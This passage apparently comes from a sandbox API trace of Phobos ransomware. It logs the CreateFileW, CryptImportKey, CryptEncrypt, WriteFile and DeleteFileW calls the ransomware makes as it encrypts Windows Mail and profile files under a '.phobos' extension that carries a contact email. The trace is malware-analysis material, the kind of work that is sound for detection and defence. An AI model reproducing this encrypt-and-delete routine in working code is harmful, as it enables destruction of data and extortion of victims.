"c:\\users\\default\\appdata\\local\\microsoft\\windows\\usrclass.dat{0f6d7aa7-f51a-11df-ae0e-001d09f21116}.tmcontainer00000000000000000001.regtrans-ms"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0207.632] GetFileSizeEx (in: hFile=0xac, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=524288) returned 1 [0207.632] CloseHandle (hObject=0xac) returned 1 [0207.632] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\UsrClass.dat{0f6d7aa7-f51a-11df-ae0e-001d09f21116}.TMContainer00000000000000000001.regtrans-ms" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\usrclass.dat{0f6d7aa7-f51a-11df-ae0e-001d09f21116}.tmcontainer00000000000000000001.regtrans-ms")) returned 0x2026 [0207.632] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\UsrClass.dat{0f6d7aa7-f51a-11df-ae0e-001d09f21116}.TMContainer00000000000000000001.regtrans-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\usrclass.dat{0f6d7aa7-f51a-11df-ae0e-001d09f21116}.tmcontainer00000000000000000001.regtrans-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0207.632] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\UsrClass.dat{0f6d7aa7-f51a-11df-ae0e-001d09f21116}.TMContainer00000000000000000001.regtrans-ms" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\usrclass.dat{0f6d7aa7-f51a-11df-ae0e-001d09f21116}.tmcontainer00000000000000000001.regtrans-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0207.632] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0207.632] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0207.632] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\UsrClass.dat{0f6d7aa7-f51a-11df-ae0e-001d09f21116}.TMContainer00000000000000000001.regtrans-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\usrclass.dat{0f6d7aa7-f51a-11df-ae0e-001d09f21116}.tmcontainer00000000000000000001.regtrans-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x10c [0207.633] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32928) returned 1 [0207.633] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0207.633] ReadFile (in: hFile=0xac, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x80000, lpOverlapped=0x0) returned 1 [0207.735] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x80010, dwBufLen=0x80010 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x80010) returned 1 [0207.740] WriteFile (in: hFile=0x10c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x80010, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x80010, lpOverlapped=0x0) returned 1 [0207.747] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32a28) returned 1 [0207.747] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0207.748] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xe0, dwBufLen=0xe0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xe0) returned 1 [0207.748] CryptDestroyKey (hKey=0xa32a28) returned 1 [0207.748] WriteFile (in: hFile=0x10c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x192, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x192, lpOverlapped=0x0) returned 1 [0207.748] CryptDestroyKey (hKey=0xa32928) returned 1 [0207.748] CloseHandle (hObject=0xac) returned 1 [0207.748] CloseHandle (hObject=0x10c) returned 1 [0207.748] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\UsrClass.dat{0f6d7aa7-f51a-11df-ae0e-001d09f21116}.TMContainer00000000000000000001.regtrans-ms" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows\\usrclass.dat{0f6d7aa7-f51a-11df-ae0e-001d09f21116}.tmcontainer00000000000000000001.regtrans-ms")) returned 1 [0207.752] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0207.752] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\account{047ef9ce-9c1f-4250-9ca7-d206db8b643c}.oeaccount"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x10c [0207.753] GetFileSizeEx (in: hFile=0x10c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1508) returned 1 [0207.753] CloseHandle (hObject=0x10c) returned 1 [0207.753] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\account{047ef9ce-9c1f-4250-9ca7-d206db8b643c}.oeaccount")) returned 0x2020 [0207.753] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\account{047ef9ce-9c1f-4250-9ca7-d206db8b643c}.oeaccount.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0207.753] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\account{047ef9ce-9c1f-4250-9ca7-d206db8b643c}.oeaccount"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x10c [0207.753] SetFilePointerEx (in: hFile=0x10c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0207.753] SetFilePointerEx (in: hFile=0x10c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0207.753] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\account{047ef9ce-9c1f-4250-9ca7-d206db8b643c}.oeaccount.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0207.754] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32928) returned 1 [0207.754] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0207.754] ReadFile (in: hFile=0x10c, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x5e4, lpOverlapped=0x0) returned 1 [0207.819] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x5f0, dwBufLen=0x5f0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x5f0) returned 1 [0207.819] WriteFile (in: hFile=0xac, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x5f0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x5f0, lpOverlapped=0x0) returned 1 [0207.820] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32a28) returned 1 [0207.820] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0207.820] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x90, dwBufLen=0x90 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x90) returned 1 [0207.820] CryptDestroyKey (hKey=0xa32a28) returned 1 [0207.820] WriteFile (in: hFile=0xac, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x142, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x142, lpOverlapped=0x0) returned 1 [0207.820] CryptDestroyKey (hKey=0xa32928) returned 1 [0207.820] CloseHandle (hObject=0x10c) returned 1 [0207.821] CloseHandle (hObject=0xac) returned 1 [0207.821] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\account{047ef9ce-9c1f-4250-9ca7-d206db8b643c}.oeaccount")) returned 1 [0207.822] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0207.822] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\account{1cd43f3b-668b-4ca8-b816-34f74122ec0f}.oeaccount"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0207.823] GetFileSizeEx (in: hFile=0xac, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=672) returned 1 [0207.823] CloseHandle (hObject=0xac) returned 1 [0207.823] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\account{1cd43f3b-668b-4ca8-b816-34f74122ec0f}.oeaccount")) returned 0x2020 [0207.823] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\account{1cd43f3b-668b-4ca8-b816-34f74122ec0f}.oeaccount.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0207.823] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\account{1cd43f3b-668b-4ca8-b816-34f74122ec0f}.oeaccount"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0207.823] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0207.823] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0207.823] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\account{1cd43f3b-668b-4ca8-b816-34f74122ec0f}.oeaccount.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x10c [0207.824] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32928) returned 1 [0207.824] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0207.824] ReadFile (in: hFile=0xac, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x2a0, lpOverlapped=0x0) returned 1 [0207.851] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x2b0, dwBufLen=0x2b0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x2b0) returned 1 [0207.851] WriteFile (in: hFile=0x10c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x2b0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x2b0, lpOverlapped=0x0) returned 1 [0207.852] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa328e8) returned 1 [0207.852] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0207.852] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x90, dwBufLen=0x90 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x90) returned 1 [0207.852] CryptDestroyKey (hKey=0xa328e8) returned 1 [0207.852] WriteFile (in: hFile=0x10c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x142, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x142, lpOverlapped=0x0) returned 1 [0207.852] CryptDestroyKey (hKey=0xa32928) returned 1 [0207.852] CloseHandle (hObject=0xac) returned 1 [0207.852] CloseHandle (hObject=0x10c) returned 1 [0207.994] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\account{1cd43f3b-668b-4ca8-b816-34f74122ec0f}.oeaccount")) returned 1 [0207.995] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0207.995] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\WindowsMail.MSMessageStore" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\backup\\new\\windowsmail.msmessagestore"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0207.996] GetFileSizeEx (in: hFile=0xac, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=2121728) returned 1 [0207.996] CloseHandle (hObject=0xac) returned 1 [0207.996] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\WindowsMail.MSMessageStore" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\backup\\new\\windowsmail.msmessagestore")) returned 0x2020 [0207.996] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\WindowsMail.MSMessageStore" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\backup\\new\\windowsmail.msmessagestore"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\WindowsMail.MSMessageStore.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\backup\\new\\windowsmail.msmessagestore.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 1 [0207.997] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\WindowsMail.MSMessageStore.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\backup\\new\\windowsmail.msmessagestore.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0207.997] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0207.997] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0207.997] ReadFile (in: hFile=0xac, lpBuffer=0x3070058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x3070058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0208.097] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0xacaaa, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0208.097] ReadFile (in: hFile=0xac, lpBuffer=0x30b0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x30b0058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0208.389] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x1c6000, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0208.389] ReadFile (in: hFile=0xac, lpBuffer=0x30f0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x30f0058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0209.365] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8b0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f91c | out: phKey=0x2e0f91c*=0xa32928) returned 1 [0209.365] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0209.365] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8d0*=0xc0070, dwBufLen=0xc0070 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8d0*=0xc0070) returned 1 [0209.371] CryptDestroyKey (hKey=0xa32928) returned 1 [0209.371] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f8 | out: lpNewFilePointer=0x0) returned 1 [0209.371] WriteFile (in: hFile=0xac, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xc0122, lpNumberOfBytesWritten=0x2e0f908, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f908*=0xc0122, lpOverlapped=0x0) returned 1 [0209.388] SetEndOfFile (hFile=0xac) returned 1 [0209.388] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x1c6000, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0209.388] WriteFile (in: hFile=0xac, lpBuffer=0x313015a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313015a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0209.389] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0xacaaa, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0209.389] WriteFile (in: hFile=0xac, lpBuffer=0x313015a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313015a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0209.398] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0209.398] WriteFile (in: hFile=0xac, lpBuffer=0x313015a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313015a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0209.400] CloseHandle (hObject=0xac) returned 1 [0209.400] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0209.400] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.pat" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\windowsmail.pat"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0209.400] GetFileSizeEx (in: hFile=0xac, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=16384) returned 1 [0209.400] CloseHandle (hObject=0xac) returned 1 [0209.401] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.pat" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\windowsmail.pat")) returned 0x2020 [0209.401] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.pat.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\windowsmail.pat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0209.401] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.pat" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\windowsmail.pat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0209.401] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0209.401] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0209.401] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.pat.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\windowsmail.pat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0209.401] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32928) returned 1 [0209.401] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0209.401] ReadFile (in: hFile=0xac, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x4000, lpOverlapped=0x0) returned 1 [0209.416] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x4010, dwBufLen=0x4010 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x4010) returned 1 [0209.416] WriteFile (in: hFile=0xfc, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x4010, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x4010, lpOverlapped=0x0) returned 1 [0209.417] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa328e8) returned 1 [0209.417] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0209.417] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0209.417] CryptDestroyKey (hKey=0xa328e8) returned 1 [0209.417] WriteFile (in: hFile=0xfc, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: 